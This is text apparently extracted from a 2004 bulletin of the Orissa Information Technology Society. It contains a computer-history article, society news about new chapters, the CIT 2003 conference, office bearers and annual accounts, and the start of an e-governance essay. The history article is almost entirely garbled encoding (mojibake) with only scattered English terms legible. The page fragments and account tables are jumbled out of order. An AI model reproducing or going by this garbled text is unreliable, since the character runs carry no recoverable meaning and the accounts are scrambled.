AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 8: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

